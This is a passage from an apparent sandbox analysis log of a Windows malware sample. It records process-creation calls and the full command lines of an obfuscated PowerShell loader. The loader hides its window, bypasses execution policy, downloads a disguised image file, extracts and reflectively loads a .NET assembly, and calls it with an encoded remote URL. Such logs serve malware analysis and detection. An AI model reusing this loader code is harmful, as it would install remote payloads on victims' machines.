♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚ZQBu♛♚GQ♛♚RgBs♛♚GE♛♚Zw♛♚p♛♚Ds♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚GU♛♚I♛♚♛♚w♛♚C♛♚♛♚LQBh♛♚G4♛♚Z♛♚♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚HQ♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚r♛♚D0♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C4♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚Ow♛♚k♛♚GI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚Ew♛♚ZQBu♛♚Gc♛♚d♛♚Bo♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚UwB1♛♚GI♛♚cwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚L♛♚♛♚g♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚KQ♛♚7♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚EM♛♚bwBu♛♚HY♛♚ZQBy♛♚HQ♛♚XQ♛♚6♛♚Do♛♚RgBy♛♚G8♛♚bQBC♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BT♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚p♛♚Ds♛♚J♛♚Bs♛♚G8♛♚YQBk♛♚GU♛♚Z♛♚BB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FI♛♚ZQBm♛♚Gw♛♚ZQBj♛♚HQ♛♚aQBv♛♚G4♛♚LgBB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚XQ♛♚6♛♚Do♛♚T♛♚Bv♛♚GE♛♚Z♛♚♛♚o♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚d♛♚B5♛♚H♛♚♛♚ZQ♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚u♛♚Ec♛♚ZQB0♛♚FQ♛♚eQBw♛♚GU♛♚K♛♚♛♚n♛♚EY♛♚aQBi♛♚GU♛♚cg♛♚u♛♚Eg♛♚bwBt♛♚GU♛♚Jw♛♚p♛♚Ds♛♚J♛♚Bt♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚HQ♛♚eQBw♛♚GU♛♚LgBH♛♚GU♛♚d♛♚BN♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚o♛♚Cc♛♚VgBB♛♚Ek♛♚Jw♛♚p♛♚C4♛♚SQBu♛♚HY♛♚bwBr♛♚GU♛♚K♛♚♛♚k♛♚G4♛♚dQBs♛♚Gw♛♚L♛♚♛♚g♛♚Fs♛♚bwBi♛♚Go♛♚ZQBj♛♚HQ♛♚WwBd♛♚F0♛♚I♛♚♛♚o♛♚Cc♛♚Z♛♚BI♛♚Gg♛♚M♛♚BM♛♚G4♛♚a♛♚♛♚z♛♚Fo♛♚MgBZ♛♚Ho♛♚T♛♚B6♛♚GM♛♚M♛♚BM♛♚Go♛♚WQ♛♚w♛♚E0♛♚aQ♛♚0♛♚Hk♛♚TwBT♛♚DQ♛♚e♛♚BP♛♚FM♛♚O♛♚B2♛♚E8♛♚bgBC♛♚D♛♚♛♚Z♛♚BH♛♚Gc♛♚PQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚ZgBk♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GE♛♚Z♛♚Bz♛♚GE♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚YwB1♛♚Cc♛♚KQ♛♚p♛♚♛♚==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jpg?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lnh3Z2YzLzc0LjY0Mi4yOS4xOS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2700
thread_handle: 0x0000057c
process_identifier: 2696
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚DY♛♚Ng♛♚v♛♚DY♛♚O♛♚♛♚z♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚agBz♛♚C4♛♚agBw♛♚Gc♛♚Pw♛♚x♛♚Dc♛♚M♛♚♛♚w♛♚DE♛♚O♛♚♛♚z♛♚Dg♛♚Ng♛♚0♛♚Cc♛♚Ow♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C♛♚♛♚PQ♛♚g♛♚E4♛♚ZQB3♛♚C0♛♚TwBi♛♚Go♛♚ZQBj♛♚HQ♛♚I♛♚BT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚E4♛♚ZQB0♛♚C4♛♚VwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚Ow♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B3♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚u♛♚EQ♛♚bwB3♛♚G4♛♚b♛♚Bv♛♚GE♛♚Z♛♚BE♛♚GE♛♚d♛♚Bh♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚KQ♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBF♛♚G4♛♚YwBv♛♚GQ♛♚aQBu♛♚Gc♛♚XQ♛♚6♛♚Do♛♚VQBU♛♚EY♛♚O♛♚♛♚u♛♚Ec♛♚ZQB0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚QgB5♛♚HQ♛♚ZQBz♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚UwBU♛♚EE♛♚UgBU♛♚D4♛♚Pg♛♚n♛♚Ds♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚RQBO♛♚EQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚BP♛♚GY♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚ZQBu♛♚GQ♛♚RgBs♛♚GE♛♚Zw♛♚p♛♚Ds♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚GU♛♚I♛♚♛♚w♛♚C♛♚♛♚LQBh♛♚G4♛♚Z♛♚♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚HQ♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚r♛♚D0♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C4♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚Ow♛♚k♛♚GI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚Ew♛♚ZQBu♛♚Gc♛♚d♛♚Bo♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚UwB1♛♚GI♛♚cwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚L♛♚♛♚g♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚KQ♛♚7♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚EM♛♚bwBu♛♚HY♛♚ZQBy♛♚HQ♛♚XQ♛♚6♛♚Do♛♚RgBy♛♚G8♛♚bQBC♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BT♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚p♛♚Ds♛♚J♛♚Bs♛♚G8♛♚YQBk♛♚GU♛♚Z♛♚BB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FI♛♚ZQBm♛♚Gw♛♚ZQBj♛♚HQ♛♚aQBv♛♚G4♛♚LgBB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚XQ♛♚6♛♚Do♛♚T♛♚Bv♛♚GE♛♚Z♛♚♛♚o♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚d♛♚B5♛♚H♛♚♛♚ZQ♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚u♛♚Ec♛♚ZQB0♛♚FQ♛♚eQBw♛♚GU♛♚K♛♚♛♚n♛♚EY♛♚aQBi♛♚GU♛♚cg♛♚u♛♚Eg♛♚bwBt♛♚GU♛♚Jw♛♚p♛♚Ds♛♚J♛♚Bt♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚HQ♛♚eQBw♛♚GU♛♚LgBH♛♚GU♛♚d♛♚BN♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚o♛♚Cc♛♚VgBB♛♚Ek♛♚Jw♛♚p♛♚C4♛♚SQBu♛♚HY♛♚bwBr♛♚GU♛♚K♛♚♛♚k♛♚G4♛♚dQBs♛♚Gw♛♚L♛♚♛♚g♛♚Fs♛♚bwBi♛♚Go♛♚ZQBj♛♚HQ♛♚WwBd♛♚F0♛♚I♛♚♛♚o♛♚Cc♛♚Z♛♚BI♛♚Gg♛♚M♛♚BM♛♚G4♛♚a♛♚♛♚z♛♚Fo♛♚MgBZ♛♚Ho♛♚T♛♚B6♛♚GM♛♚M♛♚BM♛♚Go♛♚WQ♛♚w♛♚E0♛♚aQ♛♚0♛♚Hk♛♚TwBT♛♚DQ♛♚e♛♚BP♛♚FM♛♚O♛♚B2♛♚E8♛♚bgBC♛♚D♛♚♛♚Z♛♚BH♛♚Gc♛♚PQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚ZgBk♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GE♛♚Z♛♚Bz♛♚GE♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚YwB1♛♚Cc♛♚KQ♛♚p♛♚♛♚==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000584
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚DY♛♚Ng♛♚v♛♚DY♛♚O♛♚♛♚z♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚agBz♛♚C4♛♚agBw♛♚Gc♛♚Pw♛♚x♛♚Dc♛♚M♛♚♛♚w♛♚DE♛♚O♛♚♛♚z♛♚Dg♛♚Ng♛♚0♛♚Cc♛♚Ow♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C♛♚♛♚PQ♛♚g♛♚E4♛♚ZQB3♛♚C0♛♚TwBi♛♚Go♛♚ZQBj♛♚HQ♛♚I♛♚BT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚E4♛♚ZQB0♛♚C4♛♚VwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚Ow♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B3♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚u♛♚EQ♛♚bwB3♛♚G4♛♚b♛♚Bv♛♚GE♛♚Z♛♚BE♛♚GE♛♚d♛♚Bh♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚KQ♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBF♛♚G4♛♚YwBv♛♚GQ♛♚aQBu♛♚Gc♛♚XQ♛♚6♛♚Do♛♚VQBU♛♚EY♛♚O♛♚♛♚u♛♚Ec♛♚ZQB0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚QgB5♛♚HQ♛♚ZQBz♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚UwBU♛♚EE♛♚UgBU♛♚D4♛♚Pg♛♚n♛♚Ds♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚RQBO♛♚EQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚BP♛♚GY♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚ZQBu♛♚GQ♛♚RgBs♛♚GE♛♚Zw♛♚p♛♚Ds♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚GU♛♚I♛♚♛♚w♛♚C♛♚♛♚LQBh♛♚G4♛♚Z♛♚♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚HQ♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚r♛♚D0♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C4♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚Ow♛♚k♛♚GI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚Ew♛♚ZQBu♛♚Gc♛♚d♛♚Bo♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚UwB1♛♚GI♛♚cwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚L♛♚♛♚g♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚KQ♛♚7♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚EM♛♚bwBu♛♚HY♛♚ZQBy♛♚HQ♛♚XQ♛♚6♛♚Do♛♚RgBy♛♚G8♛♚bQBC♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BT♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚p♛♚Ds♛♚J♛♚Bs♛♚G8♛♚YQBk♛♚GU♛♚Z♛♚BB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FI♛♚ZQBm♛♚Gw♛♚ZQBj♛♚HQ♛♚aQBv♛♚G4♛♚LgBB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚XQ♛♚6♛♚Do♛♚T♛♚Bv♛♚GE♛♚Z♛♚♛♚o♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚d♛♚B5♛♚H♛♚♛♚ZQ♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚u♛♚Ec♛♚ZQB0♛♚FQ♛♚eQBw♛♚GU♛♚K♛♚♛♚n♛♚EY♛♚aQBi♛♚GU♛♚cg♛♚u♛♚Eg♛♚bwBt♛♚GU♛♚Jw♛♚p♛♚Ds♛♚J♛♚Bt♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚HQ♛♚eQBw♛♚GU♛♚LgBH♛♚GU♛♚d♛♚BN♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚o♛♚Cc♛♚VgBB♛♚Ek♛♚Jw♛♚p♛♚C4♛♚SQBu♛♚HY♛♚bwBr♛♚GU♛♚K♛♚♛♚k♛♚G4♛♚dQBs♛♚Gw♛♚L♛♚♛♚g♛♚Fs♛♚bwBi♛♚Go♛♚ZQBj♛♚HQ♛♚WwBd♛♚F0♛♚I♛♚♛♚o♛♚Cc♛♚Z♛♚BI♛♚Gg♛♚M♛♚BM♛♚G4♛♚a♛♚♛♚z♛♚Fo♛♚MgBZ♛♚Ho♛♚T♛♚B6♛♚GM♛♚M♛♚BM♛♚Go♛♚WQ♛♚w♛♚E0♛♚aQ♛♚0♛♚Hk♛♚TwBT♛♚DQ♛♚e♛♚BP♛♚FM♛♚O♛♚B2♛♚E8♛♚bgBC♛♚D♛♚♛♚Z♛♚BH♛♚Gc♛♚PQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚ZgBk♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GE♛♚Z♛♚Bz♛♚GE♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚YwB1♛♚Cc♛♚KQ♛♚p♛♚♛♚==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
filepath: powershell
1 1 0

CreateProcessInternalW

 thread_identifier: 2804
thread_handle: 0x00000448
process_identifier: 2800
current_directory: C:\Users\test22\AppData\Local\Temp
filepath:
track: 1
